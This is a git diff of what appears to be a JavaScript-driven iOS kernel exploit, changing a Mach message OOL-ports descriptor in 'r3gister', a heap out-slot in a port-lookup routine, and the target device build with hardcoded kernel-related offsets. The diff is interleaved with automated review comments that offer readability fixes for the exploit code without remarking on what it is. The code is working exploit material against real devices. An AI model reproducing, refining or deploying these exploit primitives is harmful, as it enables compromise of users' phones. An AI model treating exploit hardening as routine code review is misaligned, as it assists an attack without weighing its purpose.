Diffstat (limited to 'src/js')
-rwxr-xr-xsrc/js/kexp/exploit.js7
-rw-r--r--src/js/primitives/call.js2
2 files changed, 4 insertions, 5 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 473bc6e..6a48f23 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -330,7 +330,7 @@ function r3gister(task, init_port_set, real_count, fake_count) {
write_u32(InP + 0x18, 1);
write_u32(InP + 0x1c, init_port_set);
write_u32(InP + 0x20, real_count);
- write_u32(InP + 0x24, 0x0213c600);
+ write_u32(InP + 0x24, ((19 << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24)));
write_u32(InP + 0x28, read_u32(NDR_record + get_dyld_shc_slide() + 0x0));
write_u32(InP + 0x2c, read_u32(NDR_record + get_dyld_shc_slide() + 0x4));
write_u32(InP + 0x30, fake_count);
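Review bot: The replacement for the descriptor word at `InP + 0x24` names one operand (`MACH_MSG_OOL_PORTS_DESCRIPTOR`) but leaves `19` as a bare literal, and it also drops the low 16 bits (`0xc600`) of the value it replaces without a comment saying that is intentional. If `19` is meant as the port disposition, spell it the same way as the type field, e.g. `write_u32(InP + 0x24, ((MACH_MSG_TYPE_COPY_SEND << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24)));`, or at least annotate it with `// disposition=19, type=OOL_PORTS; low 16 bits deliberately zero`. As written, a later reader cannot tell whether the old `0xc600` half was a bug or a field that is now missing. The body of `r3gister` starts and ends outside the hunk.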
@@ -349,10 +349,8 @@ function r3gister(task, init_port_set, real_count, fake_count) {
function mach_ports_lookup_shit() {
printf("fuck\n");
var arrz = shit_heap(4);
- var arrz2 = shit_heap(4);
printf("fuck\n");
- write_u32(arrz, arrz2);
- write_u32(arrz2, 0);
+ write_u32(arrz, 0);
printf("fuck\n");
var sz = shit_heap(4);;
printf("fuck\n");
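Review bot: The new `write_u32(arrz, 0);` replaces a two-level indirection with a plain zero store but carries no comment, so the reason for clearing the slot rather than leaving it uninitialised is lost with the removed `arrz2` lines. If `arrz` is an out-slot that the lookup call later fills and that the function's `return read_u32(read_u32(arrz) + 8)` reads through, say so: `// out-slot for the lookup; cleared so a failed call leaves a recognisable 0 rather than stale heap data`. The enclosing `mach_ports_lookup_shit` continues past the end of this hunk, and the neighbouring `var sz = shit_heap(4);;` (context, not changed here) has a stray second semicolon worth tidying in the same pass.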
@@ -365,6 +363,7 @@ function mach_ports_lookup_shit() {
printf("mpl success\n");
return read_u32(read_u32(arrz) + 8);
+// return 0x42603;
}
var kernel_task_addr = 0;
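Review bot: The added `// return 0x42603;` is commented-out code placed after an unconditional `return`, so it is both dead and unreachable; it reads as a leftover debugging override rather than documentation. Either delete the line or, if the constant is a known-good value kept for manual testing, turn it into a real comment that says so, e.g. `// debug: a previously observed result was 0x42603; uncomment the return above to short-circuit the lookup`. The function `mach_ports_lookup_shit` whose closing brace this hunk shows begins in the previous hunk, and its `return` dereferences `read_u32(arrz)` which that hunk now initialises to 0 — a comment on what is expected to fill it before the read would help the next reader.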
diff --git a/src/js/primitives/call.js b/src/js/primitives/call.js
index 760ca40..e38026f 100644
--- a/src/js/primitives/call.js
+++ b/src/js/primitives/call.js
@@ -1,7 +1,7 @@
var N94AP_13G37 = 0x0;
var N78AP_13G36 = 0x1;
-var build_for = N78AP_13G36;
+var build_for = N94AP_13G37;
if (build_for == N94AP_13G37) {
var __stack_chk_fail_lazy_addy = 0x346afc48;